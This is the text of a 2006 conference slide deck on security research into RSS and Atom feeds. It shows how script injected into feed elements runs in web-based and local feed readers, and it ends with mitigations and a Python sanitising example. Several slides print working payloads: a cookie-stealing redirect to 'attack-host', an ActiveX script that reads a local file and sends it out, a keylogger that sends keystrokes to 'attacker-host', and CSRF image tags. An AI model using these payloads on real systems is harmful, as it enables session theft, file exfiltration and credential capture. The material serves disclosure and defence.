Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systems Black Hat USA 2006 Presented by Bob Auger Research & Development Engineer, SPI Dynamics


Page 1: Research & Development Engineer, SPI Dynamicsindex-of.es/Hacking/Hacking-RSS-and-Atom/RSS-Security.pdfConsumer Testing (Web Based) (Continued) • Perform Cross Site Request Forgery

Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systems
Black Hat USA 2006
Presented by Bob Auger
Research & Development Engineer, SPI Dynamics

Page 2: Talk Overview

• What are RSS and Atom web feeds?
• Application types using them
• What was tested
• How to utilize a web feed vulnerability
• How each client type was tested
• What was discovered
• Vendor solutions

Page 3: What are web feeds?

• A way to share content
  – News stories
  – Movies and MP3's
  – Blog entries
• Use XML to store data
• They don't require the user to visit the site/resource in which the content is coming from
• RSS and Atom are the most popular web feed formats in use

Page 4: What do they look like?

• RSS Example

<rss version="0.91"><channel>
<title>XML.com</title>
<link>http://www.xml.com/</link>
<description>XML.com features a rich mix of information and services for the XML community.</description>
<language>en-us</language>
<item>
<title>Normalizing XML, Part 2</title>
<link>http://www.xml.com/pub/a/2002/12/04/normalizing.html</link>
<description>In this second and final look at applying relational normalization techniques to W3C XML Schema data modeling, Will Provost discusses when not to normalize, the scope of uniqueness and the fourth and fifth normal forms.</description>
</item>
</channel>
</rss>

• Atom Example

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Example Feed</title>
<subtitle>Insert witty or insightful remark here</subtitle>
<link href="http://example.org/"/>
<updated>2003-12-13T18:30:02Z</updated>
<author>
<name>John Doe</name>
<email>johndoe@example.com</email>
</author>
<id>urn:uuid:60a76c80-d399-11d9-b91C-0003939e0af6</id>
<entry>
<title>Atom-Powered Robots Run Amok</title>
<link href="http://example.org/2003/12/13/atom03"/>
<id>urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a</id>
<updated>2003-12-13T18:30:02Z</updated>
<summary>Some text.</summary>
</entry>
</feed>

Page 5: About RSS and Atom

- RSS (Really Simple Syndication)
  • First widely adopted version was 0.90 created by Netscape in 1999
  • RSS Versions 0.90, 0.91, 0.92, 1.0, 1.1, 2.0.1
- Atom
  • In July 2003 Atom 0.2 was created on a Wiki owned by Sam Ruby
  • Project moved to the IETF 'Atompub working group' and created a formal Atom 1.0 standard in July 2005
  • Atom Versions 0.2, 0.3, 1.0

Page 6: Who uses them?

- News Sites
  • CNN
  • MSNBC
  • Slashdot
- Website owners seeking dynamic content
  - Provide on topic content to their users
  - Place dynamic links on their sites to boost traffic (SEO) and search engine index-ability.
- Bloggers
- P2P Sites

Page 7: How do web feeds work?

• Producers
  – Create the XML feed
  – Store the feed in an XML file, or create it dynamically
• Consumers
  – Use content from the feed
    • News Stories, Blog Entries, etc

Page 8: How do web feeds work? (Continued)

• Consumers
  – Multiple types of consumer client types
    • Standalone clients
      – Browsers
      – RSS Reader and Sharp Reader
      – P2P Clients, and podcasting tools
    • Online Readers such as Bloglines
    • Other Websites
      – May display feed content on their website
      – May reuse a feed's content in its own feed

Page 9: What client types were tested?

• Local Readers
  – Browsers
  – Other Standalone readers
• Web based readers
• Risks associated with feed syndication by web sites
  – Displaying the content on a site
  – Utilized a feed to populate its own

Page 10: How does one utilize a web feed vulnerability?

• Vulnerabilities in web feed clients can be utilized if
  – The feed owner is malicious. This will not be the case in most situations, but is a possibility.
  – The site providing the feed was hacked. Defacement archives show thousands of sites being defaced daily. An attacker deciding to inject malicious payloads into a feed rather than deface the site has a greater chance of evading detection for a longer period of time, and thus to affect more machines.
  – Some Web-based feeds are often created from mailing lists, bulletin board messages, peer-to-peer (P2P) websites, Bit Torrent sites or user postings on a Blog. This provides a convenient method to inject a malicious payload.
  – The feed is somehow modified during the transport phase via Proxy Cache poisoning. While worth mentioning, the likelihood of this is slim.

Page 11: What was tested?

• Identify commonly used XML elements in both RSS and Atom Formats
  – Feed Title
  – Feed Description
  – Story Title
  – Story Link
  – Story Body/Description

Page 12: How were they tested?

• Produced our own feeds with malicious content
  – RSS
  – Atom
• Attacked the common elements
  – HTML/Script Injection (Cross Site Scripting)
• Observed different behaviors
  – Literal HTML/Script Injection
  – HTML Entities (&lt; is the HTML entity for < )
  – Combination

Page 13: Example Feeds (Literal HTML Injection)

• Both feed examples simplified

RSS Example:

<item rdf:about="http://host/about.foo">
<title><script>alert('Item Title')</script></title>
<link>http://host/?<script>alert('Item Link')</script></link>
<description><script>alert('Item Description')</script></description>
<author><script>alert('Item Author')</script></author>
</item>

Atom Example

<entry xmlns="http://www.w3.org/2005/Atom">
<author><name><script>alert('Entry Author Name')</script></name></author>
<published>2005-09-15T06:27:00-07:00</published>
<updated>2005-09-15T13:33:06</updated>
<link href="http://url/?<script>alert('Entry Link')</script>" rel="alternate" title="<script>alert('Entry Link Title')</script>" type="text/html"/>
<id>tag:url.com,1999:blog-6356614.post-112679118286717848<script>alert('Entry ID')</script></id>
<title type="html"><script>alert('Entry Title')</script></title>
<content type="xhtml" xml:base="http://url" xml:space="preserve"><div xmlns="http://www.w3.org/1999/xhtml"><script>alert('Entry Div XMLNS')</script></div></content>
<draft xmlns="http://purl.org/atom-blog/ns#">false</draft>
</entry>

Page 14: Example Feeds (HTML Entity Injection)

• XML specification requires non XML tags utilizing the < tag be converted to &lt; for storage and that it be converted back to < for use

RSS Example

<item rdf:about="http://host/about.foo">
<title> &lt;script&gt;alert('Item Title')&lt;/script&gt;</title>
<link>http://host/?&lt;script&gt;alert('Item Link')&lt;/script&gt;</link>
<description>&lt;script&gt;alert('Item Description')&lt;/script&gt;</description>
<author>&lt;script&gt;alert('Item Author')&lt;/script&gt;</author>
</item>

Atom Example

<entry xmlns="http://www.w3.org/2005/Atom">
<author><name>&lt;script&gt;alert('Entry Author Name')&lt;/script&gt;</name></author>
<published>2005-09-15T06:27:00-07:00</published>
<updated>2005-09-15T13:33:06</updated>
<link href="http://url/?&lt;script&gt;alert('Entry Link')&lt;/script&gt;" rel="alternate" title="&lt;script&gt;alert('Entry Link Title')&lt;/script&gt;" type="text/html"/>
<id>tag:url.com,1999:blog-6356614.post-112679118286717848&lt;script&gt;alert('Entry ID')&lt;/script&gt;</id>
<title type="html">&lt;script&gt;alert('Entry Title')&lt;/script&gt;</title>
<content type="xhtml" xml:base="http://url" xml:space="preserve"><div xmlns="http://www.w3.org/1999/xhtml">&lt;script&gt;alert('Entry Div XMLNS')&lt;/script&gt;</div></content>
<draft xmlns="http://purl.org/atom-blog/ns#">false</draft>
</entry>

Page 15: Example Feeds (Literal/Combination Injection)

RSS Example:

<item rdf:about="http://host/about.foo">
<title> &lt;script>alert('Item Title')&lt;/script></title>
<link>http://host/?&lt;script>alert('Item Link')&lt;/script></link>
<description>&lt;script>alert('Item Description')&lt;/script></description>
<author>&lt;script>alert('Item Author')&lt;/script></author>
</item>

Atom Example

<entry xmlns="http://www.w3.org/2005/Atom">
<author><name>&lt;script>alert('Entry Author Name')&lt;/script></name></author>
<published>2005-09-15T06:27:00-07:00</published>
<updated>2005-09-15T13:33:06</updated>
<link href="http://url/?&lt;script>alert('Entry Link')&lt;/script>" rel="alternate" title="&lt;script>alert('Entry Link Title')&lt;/script>" type="text/html"/>
<id>tag:url.com,1999:blog-6356614.post-112679118286717848&lt;script>alert('Entry ID')&lt;/script></id>
<title type="html">&lt;script>alert('Entry Title')&lt;/script></title>
<content type="xhtml" xml:base="http://url" xml:space="preserve"><div xmlns="http://www.w3.org/1999/xhtml">&lt;script>alert('Entry Div XMLNS')&lt;/script></div></content>
<draft xmlns="http://purl.org/atom-blog/ns#">false</draft>
</entry>

Page 16: Consumer Testing (Web Based)

• Utilized the example feeds
• Subscribed to them with an online reader
  – Traditionally literal tag injection yielded better results
  – HTML Entities/Combination were not converted
• Managed to inject and execute JavaScript
  – Steal Cookies from the online web reader site

<item rdf:about="http://host/about.foo">
<title>My Story Title</title>
<link>http://host/story.php</link>
<description><script>document.location='http://attack-host/cgi-bin/cookie.cgi?'%20+document.cookie</script></description>
</item>

Page 17: Consumer Testing (Web Based) (Continued)

• Perform Cross Site Request Forgery (CSRF) Attacks
  – Trick the browser into sending a request to a site they may be currently logged into, and perform a website function
  – They exploit the trust the website has for the client making the requests

<item rdf:about="http://host/about.foo">
<title>My Story Title</title>
<link>http://host/story.php</link>
<description><img src="https://store.example.com/buy?item=stamps&quantity=100"></description>
</item>

• Context of the vulnerability was within the site's remote zone
• Had access to functionality exposed with Cross Site Scripting Attacks
• Ability to log keystrokes
• How practical is this vulnerability?

Page 18: Major web based readers affected (Bloglines)

• Bloglines
  – Poor input filtering
    • Onmouseover vs onmouseover

Page 19: Other Major sites affected

• 10/18/2005 an issue is discovered in Yahoo
  • http://www.alljer.com/yahoorssxss.htm
• 7/2006 an issue is discovered in Google's RSS reader
  • http://ha.ckers.org/blog/20060704/cross-site-scripting-vulnerability-in-google/

Page 20: Consumer Testing Example (Local Reader)

• Utilized the example feeds
• Subscribed to them with a local reader
  – Tested browsers
  – Tested stand alone clients
  – HTML Entity injection yielded better results
• Discovered different readers used different contexts
  – Local Zone
  – Remote Zone/Same Site

Page 21: Consumer Testing Example (Local Reader) (Continued)

• Remote Context
  – Remote zone is within the same site context, or the site being 'viewed'
    • Access to cookies on that same site
  – Does not have access to the file system intentionally
  – Sending other types of requests
    • Web based Attacks
      – SQL Injection, Command Execution, Denial of Service, Cross Site Request Forgery (CSRF)

<img src="https://site/buy?item=stamps&quantity=100">

• Potential for Web Form Spam
  – Many technologies/libraries allow conversion of POST to GET such as Perl's CGI.pm Module

Page 22: Consumer Testing Example (Local Reader) (Continued)

• Local Zone Context
  – You'll typically be in the local zone when reading a file directly from the file system
  – Ability to do most of what is possible in the remote zone
  – Access to interesting ActiveX Components
    • Access to the File system
    • Unrestricted access to the XMLHTTP object (Ajax)

Page 23: Local Reader Testing Example (Local Zone)

• ActiveX components may allow Local Access to the file system
• Live Demo

<item rdf:about="http://site/about.foo">
<title>My witty title</title>
<link>http://site/url</link>
<description><script>
txtFile="";
theFile="C:\\test.txt";
var thisFile = new ActiveXObject("Scripting.FileSystemObject");
var ReadThisFile = thisFile.OpenTextFile(theFile,1,true);
txtFile+= ReadThisFile.ReadAll();
heavyImage = new Image();
heavyImage.src = "http://host/?file=" + txtFile;
ReadThisFile.Close();
</script></description>
</item>

Page 24: Local Reader Testing Example (Local Zone) (Continued)

• 64.x.x.x -- [24/Jul/2006:11:42:28 -0400] "GET /?file=This%20is%20text%20from%20within%20c:\\test.txt HTTP/1.1" 200 31973 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
• Yes the user is presented with a popup in this example. Since when has this stopped an attacker?

Page 25: Local Reader Testing Example (Local Zone) (Continued)

• Local provides unrestricted access to the XMLHTTP/XMLHttpRequest AJAX object
  – Port scanning of backend networks
  – Attacking discovered hosts

<item rdf:about="http://site/about.foo">
<title>My witty title</title>
<link>http://site/url</link>
<description><script>
var post_data = 'name=value';
var xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.open("POST", 'http://url/path/file.ext', true);
xmlhttp.onreadystatechange = function() {
  if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); }
};
xmlhttp.send(post_data);
</script></description>
</item>

Page 26: Local Reader Testing Example (Local Zone) (Continued)

Page 27: Consumer Testing Example (Website)

• Website feed usage
  – Context displayed on the site
• An attacker can obtain 'site context' (or remote zone) access if HTML tag injection is allowed
  – Cookie Theft, CSRF, keystroke logging
  – Common risks associated with Cross Site Scripting
• What if the attacker managed to get their script executed on a website displaying their feed?

Page 28: Consumer Testing Example (Website feed) (Continued)

• Content recycled into a new feed
  – Sites filtering malicious tags such as < and > may still allow attack propagation
    • Example allowing &lt; and &gt;
  – Their feed may be recycled on another website
  – Allows an attacker to obtain multiple site contexts
  – If the 2nd feed is included in a 3rd feed

<item>
<title>Bugtraq: OpenPKG-SA-2006.013 OpenPKG Security Advisory (mutt) (SecurityFocus Vulnerabilities)</title>
<link>http://www.securityfocus.com/archive/1/440148</link>
<guid>http://www.securityfocus.com/archive/1/440148</guid>
</item>

  – Issues associated with Local Readers are wide open to the users of the website implementing the feed

Page 29: Overall testing results

• The majority of applications tested were affected
  – Many stripped out literal tag injection
    • <script>Foo</script>
• Web based readers were typically affected
  – The majority converted the HTML entities to < and > before displaying it
    • &lt;script&gt;Foo&lt;/script&gt;
• Local readers typically affected
  – Some of them stripped the < bracket and were affected by HTML entities
    • &lt;script>Foo&lt;/script>
• Local readers
  • Lack of Validation during the presentation phase

Page 30: Products affected

• Most applications tested affected to some point
• Web Based Readers
  – Bloglines
• Local Readers
  – RSS Reader (#1 on Google)
  – RSS Owl
  – Feed Demon
  – Sharp Reader

Page 31: Practical Use Case #1

Page 32: Practical Use Case #2 (Website)

• An attacker may inject keystroke logging JavaScript on a website displaying the feed

<script LANGUAGE="JavaScript">
document.captureEvents(Event.KEYPRESS);
document.onkeypress = captureKeyStrokes;
function captureKeyStrokes(e) {
  var key = String.fromCharCode(e.which);
  var img = new Image();
  var src = "http://attacker-host/?" + "keystroke=" + escape(key);
  img.src = src;
  return true;
}
</script>

Page 33: Practical Use Case #2 (Website) (Continued)

• Some sites display the feed on every page. This makes keystroke logging very convenient
  – Allows an attacker to record everything the user is typing, on every page. This could include sensitive information such as credentials or other personal data
  – Demo Key stroke logging

Page 34: Practical Use Case #3 (Web Site)

Page 35: What's the solution? Security or usability?

Security
• Stripping malicious tags such as < > ( )
  – May remove functionality and the ability for HTML formatting
  – Will prevent the issues discovered
  – Removes HTML formatting
• Converting tags to their HTML entities for the presentation phase

Usability
• Disabling Script, Applet, and Plug-in Execution
  – Allow HTML
  – Still allows CSRF attacks
  – Provides more functionality

Middle ground
• White listing certain HTML Tags
  – <b>
  – <br>
  – <font>
  – Restrict HTML attributes
• Disable script/plug-in execution
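As an added example (not from the deck), the following Python applies the presentation-phase choices above to items modelled on the HTML Entity Injection and Literal Injection slides: an XML parser decodes &lt;script&gt; back to <script> (the storage-to-use conversion the deck describes), the naive renderer then emits it as markup, the "security" option converts it back to entities, and the "middle ground" option re-enables only bare <b>, <br> and <font>. The sample items are constructed (rdf:about omitted so they parse stand-alone) and the http(s)-only href check is an assumption of this example.

```python
# Added example, not from the deck: a feed consumer's presentation phase for
# the title/link/description elements, run over constructed items modelled on
# the deck's entity and literal injection samples (rdf:about omitted so they
# parse stand-alone). The http(s)-only href check is an addition of this example.
import html
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

ENTITY_ITEM = """<item>
<title>&lt;script&gt;alert('Item Title')&lt;/script&gt;</title>
<link>http://host/?&lt;script&gt;alert('Item Link')&lt;/script&gt;</link>
<description>&lt;b&gt;bold&lt;/b&gt; &lt;script&gt;alert('Item Description')&lt;/script&gt;</description>
</item>"""

LITERAL_ITEM = """<item>
<title><script>alert('Item Title')</script></title>
<link>http://host/?<script>alert('Item Link')</script></link>
<description><script>alert('Item Description')</script></description>
</item>"""

FIELDS = ("title", "link", "description")


def extract_fields(item_xml: str) -> dict:
    """Parse with a real XML parser. This is the storage-to-use conversion the
    deck describes: &lt;script&gt; in the file becomes '<script>' in memory,
    while a literal <script> becomes a child element whose tag is not text
    (which is why literal injection was often 'stripped' by the readers)."""
    root = ET.fromstring(item_xml)
    return {f: "".join(root.find(f).itertext()) for f in FIELDS}


def render_naive(fields: dict) -> str:
    """What the affected readers did: decoded strings dropped straight into HTML."""
    return (f'<h2>{fields["title"]}</h2>'
            f'<a href="{fields["link"]}">link</a>'
            f'<p>{fields["description"]}</p>')


def safe_href(link: str) -> str:
    """Only absolute http(s) links are allowed into an href; anything else is dropped."""
    parts = urlsplit(link)
    return link if parts.scheme in ("http", "https") and parts.netloc else ""


def render_escaped(fields: dict) -> str:
    """The deck's 'security' option: convert tags to their HTML entities at
    presentation. No HTML formatting survives, but neither does any script."""
    return (f'<h2>{html.escape(fields["title"])}</h2>'
            f'<a href="{html.escape(safe_href(fields["link"]))}">link</a>'
            f'<p>{html.escape(fields["description"])}</p>')


# The deck's 'middle ground': whitelist a few tags and restrict attributes
# (here: none at all are allowed).
ALLOWED_TAG_RE = re.compile(r"&lt;(/?)(b|br|font)&gt;", re.IGNORECASE)


def whitelist_html(text: str) -> str:
    """Escape everything, then re-enable only bare whitelisted tags. A tag that
    carries attributes (e.g. <b onmouseover="...">) no longer matches the
    pattern after escaping, so it stays inert text."""
    escaped = html.escape(text)
    return ALLOWED_TAG_RE.sub(lambda m: f"<{m.group(1)}{m.group(2).lower()}>", escaped)


def render_whitelist(fields: dict) -> str:
    """Whitelisted formatting in the body; title and link still fully escaped."""
    return (f'<h2>{html.escape(fields["title"])}</h2>'
            f'<a href="{html.escape(safe_href(fields["link"]))}">link</a>'
            f'<p>{whitelist_html(fields["description"])}</p>')


if __name__ == "__main__":
    for name, item in (("entity", ENTITY_ITEM), ("literal", LITERAL_ITEM)):
        fields = extract_fields(item)
        print(f"{name} naive:     {render_naive(fields)}")
        print(f"{name} escaped:   {render_escaped(fields)}")
        print(f"{name} whitelist: {render_whitelist(fields)}")
```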

Page 36: Additional areas of research

• P2P applications
• Podcasting Clients
  – Automatically download files
• DVR's such as Tivo and embedded systems
• Ad spamming into existing feeds
• SEO (Search Engine Optimization) spamming
• Extensive review of each element in the RSS and Atom Standards

Page 37: References and Additional Reading

• Hacking Web 2.0: RSS and Atom Feed Implementation Vulnerabilities
  – http://www.spidynamics.com/spilabs/education/whitepapers.html
• Cross-Site Request Forgery
  – http://en.wikipedia.org/wiki/Cross-site_request_forgery
• Wikipedia RSS Page
  – http://en.wikipedia.org/wiki/RSS_(file_format)
• RSS Specification
  – http://www.rss-specifications.com/rss-specifications.htm
• Phishing with Superbait
  – http://www.whitehatsec.com/presentations/phishing_superbait.pdf
• Atom Specification
  – http://www.atomenabled.org/
• RSS Security Resource Archive (Bigpimpin)
  – http://www.cgisecurity.com/rss/

Page 38: Conclusions

• Regardless where the data is coming from you need to assume it's malicious
  – What context is this data going to be used in?
• Identify potential risks
  – What type of data is worth storing?
• White list acceptable data types
• Cross Site Scripting is starting to become more useful
• These slides can be found on http://www.spidynamics.com/